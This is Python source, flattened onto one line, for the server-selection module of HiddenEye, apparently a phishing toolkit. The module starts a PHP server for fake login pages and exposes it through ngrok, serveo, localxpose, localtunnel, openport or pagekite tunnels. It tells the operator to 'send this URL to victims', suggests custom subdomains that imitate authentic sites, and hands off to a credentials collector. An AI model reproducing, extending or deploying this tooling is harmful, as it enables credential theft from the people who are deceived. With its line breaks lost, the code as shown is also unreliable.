# # HiddenEye Copyright (C) 2020 DarkSec https://dark-sec-official.com # This program comes with ABSOLUTELY NO WARRANTY; for details read LICENSE. # This is free software, and you are welcome to redistribute it # under certain conditions; you can read LICENSE for details. # from Defs.ImportManager.unsorted_will_be_replaced import run_command, run_background_command, wait, ngrok, requests, \ regular_expression, check_output, CalledProcessError, chdir, chmod, DEVNULL, PIPE, path import Defs.ThemeManager.theme as theme import Defs.LocalizationManager.lang_action_manager.lang_server.lang_server_runner as localization import Defs.LocalizationManager.lang_global_usage as global_localization from Defs.LocalizationManager.helper import print_sorted_as_menu import os try: os.mkdir("Server/www") except FileExistsError: pass enter_server_www = chdir("Server/www") exit_server_www = chdir("../..") default_palette = theme.default_palette def server_selection(port): # Question where user must select server run_command('clear') # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n-------------------------------\n # ) print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(localization.lang_server_selection["server_selection"]) print(localization.lang_server_selection["select_any_available_server"]) print_sorted_as_menu(localization.lang_server_selection["servers_list"]) choice = input(global_localization.input_line) choice = choice.zfill(2) if choice == '00': run_command('clear') start_localhost(port) # FIXED elif choice == '01': run_command('clear') start_ngrok(port) # FIXED elif choice == '02': run_command('clear') start_serveo(port) # ALMOST FIXED elif choice == '03': run_command('clear') start_localxpose(port) # DOESN'T GET ENTERED CREDENTIALS BACK elif choice == '04': run_command('clear') start_localtunnel(port, True) elif choice == '05': run_command('clear') start_openport(port) elif choice == '06': run_command('clear') start_pagekite(port) else: run_command('clear') return server_selection(port) def set_php(host='', port=80): run_command(['killall', '-2', 'php'], stdout=DEVNULL, stderr=DEVNULL) run_background_command(["php", "-S", "{0}:{1}".format(host, port), "-t", "Server/www"], stdout=DEVNULL, stderr=DEVNULL) def set_port(port=80): run_background_command( ["fuser", "-k", "{0}/tcp".format(port)], stdout=DEVNULL, stderr=DEVNULL) def start_server(port=80): # run_command(["fuser", "-k", "{0}/tcp".format(port), ">", "/dev/null", # "2>&1"**/]) set_port(port) # enter_server_www # run_command(["php", "-S", "{0}".format(port), ">", # "/dev/null", "2>&1", "&"]) set_php(port=port) # exit_server_www def start_localhost(port): run_command('clear') # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n------------------------------- # '') print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_localhost["localhost_server"]) host = "" print(localization.lang_start_localhost["your_localhost_is"] + host) set_port() # run_command("cd Server/www/ # && php -S {0}:{1} > /dev/null 2>&1 &".format(host, port)) enter_server_www set_php(host, port) print(localization.lang_start_localhost[ "starting_server_on_addr"] + "{0}:{1}".format(host, port)) # wait(2) run_command('clear') # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n------------------------------- # ''') print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_localhost["running_localhost_server"]) # print("- # ".format(default_palette[0], default_palette[2], default_palette[3], port, host)) print(localization.lang_start_localhost["send_this_url_suggestion"]) print(localization.lang_start_localhost[ "localhost_url"] + '{0}:{1}\n'.format(host, port)) def start_ngrok(port): ngrok.DEFAULT_CONFIG_PATH = ".config/ngrok.yml" # ngrok.set_auth_token("") # Will be easier to input # later run_command(['killall', '-2', 'ngrok'], stdout=DEVNULL, stderr=DEVNULL) run_command('clear') # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n------------------------------- # ''') print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_ngrok["ngrok_server"]) # run_command(['./Server/ngrok http {0}'.format(port)], stdout=DEVNULL, stderr=DEVNULL) # chmod('Server', 0o777) # run_command(['Server/ngrok', 'http {0}'.format(port)],stdout=DEVNULL, # stderr=DEVNULL) ngrok.connect(port=int(port)) # currentDirectory = os.getcwd() #DELETE # print(currentDirectory) #DELETE while True: wait(2) # urlFile = open('link.url', 'w') # run_command(['curl', '-s', '-N', '', '|', 'grep', 'https://[0-9a-z]*\.ngrok.io', '-oh'], stdout=urlFile) #To Be Replaced # urlFile = open('link.url', 'r') # url = urlFile.read() ngrok_tunnels = ngrok.get_tunnels() url = ngrok_tunnels[0].public_url # urlFile.close() if regular_expression.match("https://[0-9a-z]*\.ngrok.io", url) is not None: # print(\n{0}[{1}*{0}]{1} Localhost URL: {2}{3} # \n{0}[{1}*{0}]{1} NGROK URL: {2}".format( # default_palette[0], default_palette[2], default_palette[3], port) + url + "{0}".format(default_palette[4])) # print("\n") print(localization.lang_start_ngrok["send_this_url_suggestion"]) print(localization.lang_start_localhost[ "localhost_url"] + '' + port) print(localization.lang_start_ngrok[ "ngrok_url"] + url + default_palette[4]) break def start_serveo(port): def is_online(): serveo = requests.get("http://serveo.net") if "temporarily disabled" in serveo.text: return False return True def random(port): run_command('clear') # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n------------------------------- # # ''') print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_random_server"]) # run_command('ssh -o StrictHostKeyChecking=no -o # ServerAliveInterval=60 -R 80:localhost:%s serveo.net > link.url 2> # /dev/null &' % (port)) run_command(['ssh', '-o', 'StrictHostKeyChecking=no', '-o', 'ServerAliveInterval=60', '-R', 'localhost:{0}'.format(port), 'serveo.net', '>', 'link.url'], stdout=DEVNULL, stderr=DEVNULL) wait(8) try: output = check_output( "grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") # print("-\n # \n{0}[{1}*{0}]{1} Localhost URL: {2}{3} # ".format(default_palette[0], default_palette[4], default_palette[3], port) + url + "{0}".format(default_palette[4])) # print("\n") print(localization.lang_start_serveo["send_this_url_suggestion"]) print(localization.lang_start_localhost[ "localhost_url"] + '' + port) print(localization.lang_start_serveo[ "serveo_url"] + url + default_palette[4]) except CalledProcessError: wait(4) run_command('clear') return random(port) def custom(port): # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n------------------------------- # \n{0}[ CREATE A CUSTOM URL HERE ]{1}!! {0}\n-------------------------------\n # \n # \n{0}Insert a custom subdomain for serveo'''.format(default_palette[0], default_palette[2])) print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_custom_server"]) print(localization.lang_start_serveo[ "make_url_simmilar_to_real_suggestion"]) print(localization.lang_start_serveo["insert_custom_subdomain"]) lnk = input(global_localization.input_line) if not ".serveo.net" in lnk: lnk += ".serveo.net" else: pass # run_command('ssh -o StrictHostKeyChecking=no -o # ServerAliveInterval=60 -o ServerAliveCountMax=60 -R # %s:80:localhost:%s serveo.net > link.url 2> /dev/null &' % (lnk, # port)) run_command( ['ssh', '-o', 'StrictHostKeyChecking=no', '-o', 'ServerAliveInterval=60', '-o', 'ServerAliveCountMax=60', '-R', '{0}:80:localhost:{1}'.format(lnk, port), 'serveo.net', '>', 'link.url'], stdout=DEVNULL, stderr=DEVNULL) wait(7) try: output = check_output( "grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") run_command('clear') # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CUSTOM SERVEO URL ]{1}!! {0} # \n-------------------------------'''.format(default_palette[0], default_palette[2])) print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_custom_server"]) # print("\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO VICTIMS- # \n{0}[{1}*{0}]{1} Localhost URL: {2}{3} # \n{0}[{1}*{0}]{1} SERVEO URL: {2}".format(default_palette[0], default_palette[2], default_palette[3], port) + url + "{0}".format(default_palette[4])) print(localization.lang_start_serveo["send_this_url_suggestion"]) print(localization.lang_start_localhost[ "localhost_url"] + '' + port) print(localization.lang_start_serveo[ "serveo_url"] + url + default_palette[4]) print("\n") except CalledProcessError: # print('''\n !!!\n # !!!\n # !! \n''') print(localization.lang_start_serveo["failed_to_get_domain"]) print(localization.lang_start_serveo["suggestion_to_fix_issue"]) print(localization.lang_start_serveo["you_can_try_to_select_other_domain"]) wait(4) run_command('clear') return custom(port) if is_online: # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n------------------------------- # # # '''.format(default_palette[0], default_palette[2])) print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_url_option_selection"]) print(localization.lang_start_serveo["serveo_phishing_warning"]) print(localization.lang_start_serveo["choose_type_of_url"]) # print(" \n".format(default_palette[0], default_palette[2])) print_sorted_as_menu(localization.lang_start_serveo["url_types"]) choice = input(global_localization.input_line) run_command('clear') if choice == '1': custom(port) elif choice == '2': random(port) else: run_command('clear') return start_serveo(port) else: # print("Serveo is DOWN now, do you want to select another option? Y/n") print(localization.lang_start_serveo["serveo_is_down"]) choice = input("HiddenEye >> ") choice = choice.lower() if choice == 'y': return server_selection(port) else: return start_serveo(port) def start_localxpose(port): def random(port): run_command('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ RANDOM LOCALXPOSE URL ]{1}!! {0}\n-------------------------------'''.format( default_palette[1], default_palette[2])) # run_command('./Server/loclx tunnel http --to :%s > link.url 2> /dev/null &' % (port)) run_command(['Server/loclx', 'tunnel', 'http', '--to', ':{0}'.format(port), '>', 'link.url'], stdout=DEVNULL, stderr=DEVNULL) wait(8) try: output = check_output( "grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True) url = output.decode('utf-8') print( "\n{0}[{1}!{0}]{1} SEND THIS LOCALXPOSE URL TO VICTIMS-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} LOCALXPOSE URL: {2}{4}{1}".format( default_palette[0], default_palette[4], default_palette[3], port, url) + "{0}".format( default_palette[4])) print("\n") except CalledProcessError: wait(4) run_command('clear') return random(port) def custom(port): print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CREATE A CUSTOM URL HERE ]{1}!! {0}\n-------------------------------\n\n{0}[{1}!{0}]{1} YOU CAN MAKE YOUR URL SIMILAR TO AUTHENTIC URL.\n\n{0}Insert a custom subdomain for Localxpose(Ex: mysubdomain)'''.format( default_palette[0], default_palette[2])) lnk = input("\n{0}CUSTOM Subdomain>>> {1}".format(default_palette[0], default_palette[2])) run_command('./Server/loclx tunnel http --to :%s --subdomain %s > link.url 2> /dev/null &' % (port, lnk)) wait(7) try: output = check_output("grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") run_command('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CUSTOM SERVEO URL ]{1}!! {0}\n-------------------------------'''.format( default_palette[0], default_palette[2])) print( "\n{0}[{1}!{0}]{1} SEND THIS LOCALXPOSE URL TO VICTIMS-\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} LOCALXPOSE URL: {2}".format( default_palette[0], default_palette[2], default_palette[3], port) + url + "{0}".format( default_palette[4])) print("\n") except CalledProcessError: print( '''\n\n{0}FAILED TO GET THIS DOMAIN. !!!\n\n{0}LOOKS LIKE CUSTOM URL IS NOT VALID or ALREADY OCCUPIED BY SOMEONE ELSE. !!!\n\n{0}[{1}!{0}]TRY TO SELECT ANOTHER CUSTOM DOMAIN{1} (GOING BACK).. !! \n'''.format( default_palette[0], default_palette[4])) wait(4) run_command('clear') return custom(port) print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALXPOSE URL TYPE SELECTION ]{1}!! {0}\n-------------------------------\n'''.format( default_palette[0], default_palette[2])) print("\n{0}[{1}*{0}]{0}CHOOSE ANY LOCALXPOSE URL TYPE TO GENERATE PHISHING LINK:{1}".format(default_palette[0], default_palette[2])) print( "\n{0}[{1}1{0}]{1}Custom URL {0}(Generates designed url) \n{0}[{1}2{0}]{1}Random URL {0}(Generates Random url)".format( default_palette[0], default_palette[2])) choice = input("\n\n{0}YOUR CHOICE >>> {1}".format(default_palette[0], default_palette[2])) run_command('clear') if choice == '1': custom(port) elif choice == '2': random(port) else: run_command('clear') return start_localxpose(port) def start_localtunnel(port, npm): run_command('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------'''.format( default_palette[0], default_palette[2])) print( "\n{0}[{1}*{0}]{0}SELECT ANY URL TYPE TO GENERATE PHISHING LINK:{1}".format(default_palette[0], default_palette[2])) print("\n{0}[{1}+{0}]{1}Type Subdomain for Custom URL. \n{0}[{1}+{0}]{1}Leave Empty For Random URL".format( default_palette[0], default_palette[2])) s = input('\n{0}(Localtunnel/Subdomain)> {1}'.format(default_palette[0], default_palette[2])) try: run_command('{0}lt -p '.format('' if npm else 'Server/') + port + ((' -s ' + s) if s != '' else s) + ' > link.url &') wait(3) run_command('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------'''.format( default_palette[0], default_palette[2])) print( "\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO VICTIMS-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} LOCALTUNNEL URL: {2}{4}".format( default_palette[0], default_palette[2], default_palette[3], port, str(check_output("grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True)).strip("b ' \ n r"))) except CalledProcessError: run_command('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------'''.format( default_palette[0], default_palette[2])) print('{0}error[invalid/preoccupied]{0}'.format(default_palette[0])) start_localtunnel(port, npm) def start_openport(port): run_command('clear') def manage_url(port): run_command('rm output.txt > /dev/null 2>&1') run_command('openport -K && openport %s > output.txt &' % (port)) print('{0}[{1}*{0}] {1}Openport Server Running in Background.. Please wait.'.format(default_palette[0], default_palette[4])) wait(20) # Sleep time is important as the openport command takes some time to give response link. run_command( 'cat output.txt | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep -v https://openport.io/user > openport.txt') # Taking out the neccesary verification link from output txt file of openport (above). print('{0}[{1}*{0}] {1}Working To Get OpenPort Tunnel Activation Link...'.format(default_palette[0], default_palette[4])) with open('openport.txt') as f: read_data = f.read() if 'openport.io/l/' in read_data: print('{0}[{1}*{0}] {1}Got Activation Link...'.format(default_palette[0], default_palette[4])) else: print('{0}[{1}^{0}] {1}Failed To Get Openport Activation Link... '.format(default_palette[0], default_palette[4])) output = open('output.txt', 'r') output = output.read() print('{0}[{1}!{0}] {1}Openport Error:\n\n{2}'.format(default_palette[0], default_palette[4], output)) input('\n\n{0}[{1}*{0}] {1}Try Other Tunnels... (Press Enter)'.format(default_palette[0], default_palette[4])) server_selection(port) urlFile = open('openport.txt', 'r') urltoverify = urlFile.read().strip() print( '{0}[{1}*{0}] {1}Open This Activation Link From Browser to Get Tunnel Link...\n'.format(default_palette[0], default_palette[4])) print('{0}[{1}*{0}] {1}Tunnel Activation Link:{0}{2} '.format(default_palette[0], default_palette[4], urltoverify)) url = input('\n\n{0}[{1}*{0}] {1}Enter The Tunnel Link Found in Browser: {0} '.format(default_palette[0], default_palette[4])) wait(4) run_command('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ OPENPORT SERVER ]{1}!! {0}\n-------------------------------'''.format( default_palette[0], default_palette[4])) print( "\n{0}[{1}!{0}]{1} SEND THIS OPENPORT URL TO VICTIMS-\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} OPENPORT URL: {2}{4}\n".format( default_palette[0], default_palette[4], default_palette[3], port, url)) print('''{1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ OPENPORT SERVER ]{1}!! {0}\n-------------------------------'''.format( default_palette[0], default_palette[2])) if 256 == run_command('which openport > /dev/null'): run_command('clear') print('[*] Openport not Installed correctly, Try installing it manually !!') print('[*] Check Here ... https://openport.io/download') input('\n Press Enter To Go back..') server_selection(port) else: manage_url(port) def start_pagekite(port): from Defs.ActionManager.simple_informant import credentials_collector run_command('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ PAGEKITE SERVER ]{1}!! {0}\n-------------------------------'''.format( default_palette[0], default_palette[2])) if 256 == run_command('which python2 > /dev/null'): print('[*] Python2 not Installed, Pagekite Only Supports Python2!!') input('\n Press Enter To Try installing Python2 Now..') run_command('apt install python2') if 256 == run_command('which python2 > /dev/null'): run_command('clear') print("\n{0}[{1}*{0}] {1}FAILED TO INSTALL PYTHON2 (TRY MANUALLY)..{1}".format(default_palette[0], default_palette[4])) wait(2) server_selection(port) else: pass else: try: subdomain = input( "\n{0}[{1}*{0}] {0}Enter A Custom Subdomain Ex.(yourname):\n{0}Custom Subdomain>>> {1}".format( default_palette[0], default_palette[2])) print("\n{0}[{1}*{0}] {1}Use Temporary Email Services(Don't Harm Anyone).{1}".format(default_palette[0], default_palette[4])) print("{0}[{1}*{0}] {1}Sometime Email verification Required by Pagekite(Stay Alert){1}".format( default_palette[0], default_palette[4])) print("{0}[{1}*{0}] {1}You can also get various subdomain assigned to your subdomain.{1}".format( default_palette[0], default_palette[4])) print("{0}[{1}*{0}] {1}Check Control Panel Of pagekite at https://pagekite.net/ .{1}".format( default_palette[0], default_palette[4])) print("{0}[{1}*{0}] {1}We are Ready to Launch Pagekite.Press CTRL+C Whenever Need captured Data.{1}".format( default_palette[0], default_palette[4])) input("\n{0}[{1}*{0}] {0}Press Enter To Launch The Pagekite...{1}".format(default_palette[0], default_palette[4])) run_command('python2 Server/pagekite.py --clean --signup {0} {1}.pagekite.me'.format(port, subdomain)) except KeyboardInterrupt: print('[!] Please Copy the Generated Link For Further Use') credentials_collector(port)